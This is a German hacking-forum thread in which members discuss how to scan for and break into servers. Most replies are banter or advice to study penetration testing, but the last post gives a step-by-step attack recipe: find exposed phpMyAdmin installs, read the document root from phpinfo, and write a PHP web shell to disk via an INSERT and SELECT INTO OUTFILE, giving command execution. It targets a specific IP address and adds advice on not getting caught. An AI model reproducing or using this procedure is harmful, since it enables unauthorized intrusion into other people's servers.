(FTP) Richtig Scannen und Cracken - Str0s TuT

**Wellenreiter** · 15.08.2015, 13:37

Uhi.... ganz lustig die Unterhaltung hier.

Sorry aber google hilft dir in allem. In Klausuren, Beziehungsproblem und genauso beim Hacken.
Beim schnellen überfliegen hier, sind einige Begriffe gefallen, mit denen man schon einen Stro bauen könnte.

Wenn du mit einer besonderen Idee Millionär geworden bist, würdest du deinen Trick anderen weiter geben, wodurch du dann weniger von hättest?
Ne. Somit wird dir bestimmt kein Hacker ein tut oder am besten noch ein video geben. Oder sehe ich das falsch??
Zudem sollte man nicht vergessen, dass du in fremde System eindringst, hoffentlich gibt es bei dir das Thema Sicherheit.

Naja trotzdem viel erfolg bei der Suche.

Wellenreiter

**Shiva** · 16.08.2015, 04:04

Der Junge schafft es nichtmal im Pub Scanner (Ksnoop) die Ranges zu editieren^^
Also Moderator des Boards würde ich den Thread dicht machen.

**Unlimiter** · 16.08.2015, 05:35

Da man hier eine Schwäche bei den Grundlagen sieht, gibt es jetzt erst einmal ein paar Links die zur Informationsgewinnung und Einführung:

Ich weiß auch nicht nach welchem Suchbegriff du googlest, aber anstatt Eingaben wie "Hacking" zu verwenden, solltest du auf den Suchbegriff "penetration-testing" umsteigen.

Ansonsten kann man dir nicht wirklich mehr Tipps geben, denn wie schon vor einigen Posts angemerkt, musst du dich zuerst mit dem Thema Systemsicherheit auseinandersetzen, um den Ablauf und mögliche Schwachstellen nachvollziehen zu können.

Nebenbei gibt es auch viele Beispiel-Isos mit diversen Szenarien, welche du zusätzlich in einen VM-Player einbinden kannst, um dein neues Wissen auch praktisch und nicht nur theoretisch anwenden zu können.

LD · 16.08.2015, 12:19

ist das sowas?
Anleitung - Scannen leicht gemacht - Freesoft-Board

**knusi** · 18.09.2015, 07:59

das beste ist am anfang, du baust dir mal eine vm und installierst da xampp.
so kannst du dich lokal an pma rantasten.

einmal drin lege ich dir folgende befehle ans herz:
SELECT sowie INTO OUTFILE
am ende das nicht vergessen, zwecks etwaigen fehlern:
; --

wirkliche tuts wirst du aber nicht finden, erst recht nicht bebildert. grundwissen musst du dir selbst anlesen und wenn man dir in 5min eine lücke erklären kann, wie man schnell reinkommt, dann nimmt sich jemand auch die zeit - niemand wird dir aber ein tut verfassen oder sich eine stunde mit dir hinsetzen und standardlücken erklären.

ich würde jetzt übrigens nicht unbedingt lokal scannen.

**R@zz@R-LightS** · 23.09.2015, 18:32

Hi Knus !

Erst einmal, scanne über´n str0

ach und shiva kann man nicht ernst nehmen ,weist ja wie er ist.

Also ich hab vor ein paar Wochen von Monk ein PMA - scann Paket bekommen,das ist bis jetzt das beste

als alles andere vorher was ich gefunden habe.Komme damit auch klar nur hab leider noch nix gefunden...

**BUSTER** · 23.09.2015, 20:47

Tool,die ihr braucht
Browser
Shell
Scannz

Also, zuerst scannt ihr.Tut gepostet
Die Results sehen dann z.B. so aus:

129.120.43.132 HTTP Request FOUND (200 OK)

Wenn ihr einen solchen scan habt geht ihr auf:

http:\\129.120.43.132\phpmyadmin\phpinfo.php

Dort guckt ihr erstmal ob das System Windows NT hat.
Danach guckt ihr unter _SERVER["DOCUMENT_ROOT"] und
Kopiert dort den Pfad der dort steht.

Das Document_Root tragt ihr dann in die Shell hier ein:

code:

INSERT INTO shell (text) values ('<? $cmd = $_REQUEST["-cmd"];
?><html><head><title>SH3LL</title></head><body bgcolor=#000000 text=#FFFFFF"
onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST> <input type=TEXT
name="-cmd" size=64 value="<?$cmd?>" tyle="background:#000000;color:#FFFFFF;"><pre><?
if ($cmd != ""; ) print Shell_Exec($cmd); ?></pre></form></body></html>'); SELECT * INTO OUTFILE 'HIERDASDOCUMENTROOT\shell.php' from shell;
FLUSH LOGS

Dann geht ihr auf:
http:\\129.120.43.132\phpmyadmin\index.php

Ihr klickt dann auf Datenbanken (Befindet sich links bei der Index.php)
Ihr wechselt dann auf die Datenbank Mysql und tragt da folgenden Sql befehl ein:

CREATE TABLE shell (text text);

Ihr habt dann eine Table erstellt die shell heißt.
Dann wechselt ihr in die Table und fügt dann als Sql befehl die oben geschriebene
Shell ein.

Wenn der Befehl erfolgreich war geht auf:

http:\\129.120.43.132\shell.php

Dort befindet sich eine cmd zeile.
Dann könnt ihr den Server ganz normal hacken wie bei MSSQL

+++++++++++++++++++++++++++++++++++++++++++

Hacken ist gefährlich und man sollte es nur mit bedacht tun !
Hacken ist strafbar und man sollte sich nicht erwischen lassen !
Hacken ist nichts für kleine Script-Kiddies die keinen Plan haben

!

++++++++++++++++++++++++++++++++++++++++++++++++

Thema: (FTP) Richtig Scannen und Cracken - Str0s TuT

Themen-Optionen

Anzeige

Hybrid-Darstellung

Diesen Mitgliedern gefällt dieser Beitrag:

Diesen Mitgliedern gefällt dieser Beitrag:

Diesen Mitgliedern gefällt dieser Beitrag:

Ähnliche Themen

nicht sichtbaren Link auf Homepage scannen/finden ?

Firefox - richtig einstellen!

(PHP) - RegEx Hilfe Twig Templates nach Sprach Strings scannen

Berechtigungen

SzeneBox.org... im Mittelpunkt der Szene!